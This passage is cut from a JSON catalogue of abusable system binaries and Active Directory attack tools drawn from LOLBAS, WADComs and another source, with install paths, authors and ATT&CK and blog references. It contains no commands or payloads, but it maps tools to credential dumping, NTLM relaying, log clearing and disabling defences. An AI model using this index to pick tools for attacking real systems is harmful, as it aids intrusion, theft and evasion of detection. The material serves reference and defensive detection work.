@bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/"],"count":1},{"id":"lolbas:vslaunchbrowser-exe","name":"VSLaunchBrowser.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"author":"Avihay Eldad","created":"2024-04-12T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"],"count":3},{"id":"lolbas:vshadow-exe","name":"Vshadow.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\vshadow.exe"],"author":"Ayberk Halaç","created":"2023-09-06T00:00:00.000Z","contributors":["Ayberk Halaç"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/"],"count":1},{"id":"lolbas:vsjitdebugger-exe","name":"vsjitdebugger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\windows\\system32\\vsjitdebugger.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsjitdebugger/"],"count":1},{"id":"lolbas:wfmformat-exe","name":"WFMFormat.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\there\\is\\no\\default\\installation\\path\\WFMFormat.exe"],"author":"Tim Baker","created":"2024-12-05T00:00:00.000Z","contributors":["Tim Baker (https://www.dotsec.com)"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WFMFormat/"],"count":1},{"id":"lolbas:wfc-exe","name":"Wfc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/"],"count":1},{"id":"lolbas:windbg-exe","name":"WinDbg.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\windbg.exe"],"author":"Avihay Eldad","created":"2025-07-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinDbg/"],"count":1},{"id":"lolbas:winproj-exe","name":"WinProj.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\WinProj.exe"],"author":"Avihay Eldad","created":"2024-02-14T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinProj/"],"count":1},{"id":"lolbas:winword-exe","name":"Winword.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/"],"count":1},{"id":"lolbas:wsb-exe","name":"wsb.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"author":"Konrad 'unrooted' Klawikowski","created":"2026-05-28T00:00:00.000Z","contributors":["Konrad 'unrooted' Klawikowski","Lloyd Davies @LloydLabs"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"],"count":3},{"id":"lolbas:wsl-exe","name":"Wsl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\wsl.exe"],"author":"Matthew Brown","created":"2019-06-27T00:00:00.000Z","contributors":["Alex Ionescu @aionescu","Matt @NotoriousRebel1","Asif Matadar @d1r4c","Nasreddine Bencherchali @nas_bench","Konrad 'unrooted' Klawikowski","Liran Ravich, CardinalOps"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"count":5},{"id":"lolbas:xbootmgr-exe","name":"XBootMgr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"author":"Avihay Eldad","created":"2025-07-10T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad","Tommy Warren"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"],"count":2},{"id":"lolbas:xbootmgrsleep-exe","name":"XBootMgrSleep.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe"],"author":"Avihay Eldad","created":"2024-06-13T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad","Yuval Saban @yuvalsaban3"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgrSleep/"],"count":1},{"id":"lolbas:devtunnel-exe","name":"devtunnel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Temp\\.net\\devtunnel\\devtunnel.exe","C:\\Users\\<username>\\AppData\\Local\\Temp\\DevTunnels\\devtunnel.exe"],"author":"Kamran Saifullah","created":"2023-09-16T00:00:00.000Z","contributors":["Kamran Saifullah @deFr0ggy"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnel/"],"count":1},{"id":"lolbas:dotnet-counters-exe","name":"dotnet-counters.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-counters.exe"],"author":"Iván Cabrera","created":"2026-08-27T00:00:00.000Z","contributors":["Iván Cabrera @ivancabrera02"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-counters/"],"count":1},{"id":"lolbas:dotnet-trace-exe","name":"dotnet-trace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-trace.exe"],"author":"Iván Cabrera","created":"2026-08-27T00:00:00.000Z","contributors":["Iván Cabrera @ivancabrera02"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-trace/"],"count":1},{"id":"lolbas:vsls-agent-exe","name":"vsls-agent.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe"],"author":"Jimmy (@bohops)","created":"2022-11-01T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/"],"count":1},{"id":"lolbas:vstest-console-exe","name":"vstest.console.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"],"author":"Onat Uzunyayla","created":"2023-09-08T00:00:00.000Z","contributors":["Onat Uzunyayla","Ayberk Halac"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"],"count":1},{"id":"lolbas:winfile-exe","name":"winfile.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\winfile.exe","C:\\Windows\\winfile.exe","C:\\Program Files\\WinFile\\winfile.exe","C:\\Program Files (x86)\\WinFile\\winfile.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"],"author":"Avihay Eldad","created":"2024-04-30T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"],"count":1},{"id":"lolbas:xsd-exe","name":"xsd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\bin\\NETFX <version> Tools\\xsd.exe"],"author":"Avihay Eldad","created":"2024-04-09T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/"],"count":1},{"id":"daemon:kubectl","name":"kubectl","source":"DAEMON","platform":["Linux","Windows"],"references":["https://attack.mitre.org/techniques/T1609/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/"],"count":9},{"id":"daemon:crictl","name":"crictl","source":"DAEMON","platform":["Linux"],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1609/"],"count":2},{"id":"daemon:ctr","name":"ctr","source":"DAEMON","platform":["Linux"],"references":["https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:runc","name":"runc","source":"DAEMON","platform":["Linux"],"references":["https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:docker","name":"docker","source":"DAEMON","platform":["Linux"],"references":["https://docs.docker.com/reference/cli/docker/container/export/","https://docs.docker.com/reference/cli/docker/image/save/","https://attack.mitre.org/techniques/T1005/"],"count":1},{"id":"daemon:nerdctl","name":"nerdctl","source":"DAEMON","platform":["Linux"],"references":["https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:msiexec","name":"msiexec.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml","https://attack.mitre.org/techniques/T1218/007/"],"count":1},{"id":"daemon:curl","name":"curl.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://curl.se/docs/manpage.html","https://curl.se/windows/"],"count":1},{"id":"daemon:tar","name":"tar.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml","https://learn.microsoft.com/en-us/windows/tar/"],"count":1},{"id":"daemon:ssh","name":"ssh.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:scp","name":"scp.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:msedge","name":"msedge.exe","source":"DAEMON","platform":["Windows","macOS","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml","https://twitter.com/mrd0x/status/1478234484881436672"],"count":1},{"id":"daemon:mpcmdrun","name":"MpCmdRun.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml","https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"],"count":1},{"id":"daemon:desktopimgdownldr","name":"desktopimgdownldr.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml","https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/"],"count":1},{"id":"daemon:appinstaller","name":"AppInstaller.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:onedrivestandaloneupdater","name":"OneDriveStandaloneUpdater.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:finger","name":"finger.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:wsl","name":"wsl.exe","source":"DAEMON","platform":["Windows","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:winget","name":"winget.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml","https://learn.microsoft.com/en-us/windows/package-manager/winget/install"],"count":1},{"id":"daemon:devtunnel","name":"devtunnel.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands"],"count":1},{"id":"daemon:teams","name":"Teams.exe","source":"DAEMON","platform":["Windows","macOS","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml","https://attack.mitre.org/techniques/T1218/015/"],"count":1},{"id":"daemon:diskshadow","name":"diskshadow.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml","https://attack.mitre.org/techniques/T1003/003/"],"count":1},{"id":"daemon:wevtutil","name":"wevtutil.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"count":2},{"id":"daemon:powershell","name":"Clear-EventLog","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog"],"count":6},{"id":"daemon:auditpol","name":"auditpol.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"],"count":1},{"id":"daemon:fsutil","name":"fsutil.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn"],"count":1},{"id":"daemon:attrib","name":"attrib.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1564/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib"],"count":1},{"id":"daemon:reg","name":"reg.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware"],"count":1},{"id":"daemon:netsh","name":"netsh.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/004/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall"],"count":1},{"id":"daemon:byovd","name":"BYOVD (vulnerable driver)","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1068/","https://www.loldrivers.io/"],"count":1},{"id":"wadcoms:ADCSEnumaration","name":"ADCSEnumaration","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/"],"count":1},{"id":"wadcoms:BloodHound.py","name":"BloodHound.py","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"],"count":2},{"id":"wadcoms:CredDumpWithoutMimilkatz","name":"CredDumpWithoutMimilkatz","source":"WADComs","platform":["Windows","Linux"],"references":["https://www.ired.team/offensive-security/credential-access-and-credential-dumping","https://www.synacktiv.com/en/publications/lsa-secrets-revisiting-secretsdump"],"count":1},{"id":"wadcoms:Dementor","name":"Dementor","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"count":1},{"id":"wadcoms:Enum4Linux","name":"Enum4Linux","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/CiscoCXSecurity/enum4linux","https://github.com/cddmp/enum4linux-ng"],"count":3},{"id":"wadcoms:Evil","name":"Evil","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/Hackplayers/evil-winrm","https://book.hacktricks.xyz/cryptography/certificates"],"count":3},{"id":"wadcoms:FindUncommonShares","name":"FindUncommonShares","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/p0dalirius/FindUncommonShares"],"count":1},{"id":"wadcoms:Impacket-dcomexec","name":"Impacket-dcomexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/"],"count":1},{"id":"wadcoms:Impacket-Get-GPPPassword","name":"Impacket-Get-GPPPassword","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py","https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/"],"count":1},{"id":"wadcoms:Impacket-GetADUsers","name":"Impacket-GetADUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py"],"count":1},{"id":"wadcoms:Impacket-GetNPUsers","name":"Impacket-GetNPUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"count":1},{"id":"wadcoms:Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/","https://github.com/fortra/impacket","https://swarm.ptsecurity.com/kerberoasting-without-spns/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"count":2},{"id":"wadcoms:Impacket-ticketer","name":"Impacket-ticketer","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/","https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"count":3},{"id":"wadcoms:Impacket-lookupsid","name":"Impacket-lookupsid","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py","https://www.puckiestyle.nl/impacket/"],"count":1},{"id":"wadcoms:Impacket-ntlmrelayx","name":"Impacket-ntlmrelayx","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/","https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.thehacker.recipes/ad/movement/credentials/dumping/laps","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/relay","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"count":10},{"id":"wadcoms:Impacket-psexec","name":"Impacket-psexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/","https://book.hacktricks.xyz/windows/active-directory-methodology/pass-the-ticket#pass-the-ticket-attack"],"count":2},{"id":"wadcoms:Impacket-rbcd","name":"Impacket-rbcd","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py","https://github.com/tothi/rbcd-attack"],"count":1},{"id":"wadcoms:Impacket-rpcdump","name":"Impacket-rpcdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-reg","name":"Impacket-reg","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/reg.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-samrdump","name":"Impacket-samrdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-smbclient","name":"Impacket-smbclient","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-smbexec","name":"Impacket-smbexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py","https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/"],"count":1},{"id":"wadcoms:Impacket-secretsdump","name":"Impacket-secretsdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"],"count":2},{"id":"wadcoms:Impacket-services","name":"Impacket-services","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-wmiexec","name":"Impacket-wmiexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#wmiexecpy"],"count":1},{"id":"wadcoms:Impacket-addcomputer","name":"Impacket-addcomputer","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"count":2},{"id":"wadcoms:Impacket-atexec","name":"Impacket-atexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"],"count":2},{"id":"wadcoms:Impacket-getST","name":"Impacket-getST","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"count":2},{"id":"wadcoms:Impacket-getTGT","name":"Impacket-getTGT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"count":1},{"id":"wadcoms:Kerbrute","name":"Kerbrute","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ropnop/kerbrute"],"count":4},{"id":"wadcoms:LDAPSearch","name":"LDAPSearch","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://linux.die.net/man/1/ldapsearch"],"count":2},{"id":"wadcoms:Mitm6","name":"Mitm6","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/dirkjanm/mitm6","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"count":1},{"id":"wadcoms:NetExec","name":"NetExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://blog.redteam-pentesting.de/2025/windows-coercion/","https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities","https://www.netexec.wiki/","https://attack.mitre.org/techniques/T1558/004/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://attack.mitre.org/techniques/T1558/003/","https://cybersecurity.bureauveritas.com/blog/timeroasting-attacking-trust-accounts-in-active-directory","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota","https://attack.mitre.org/techniques/T1087/002/","https://www.netexec.wiki/mssql-protocol/command-execution","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.netexec.wiki/mssql-protocol/authentication","https://www.netexec.wiki/mssql-protocol/mssql-privesc","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass","https://www.netexec.wiki/smb-protocol/spidering-shares","https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam"],"count":24},{"id":"wadcoms:Nmap","name":"Nmap","source":"WADComs","pla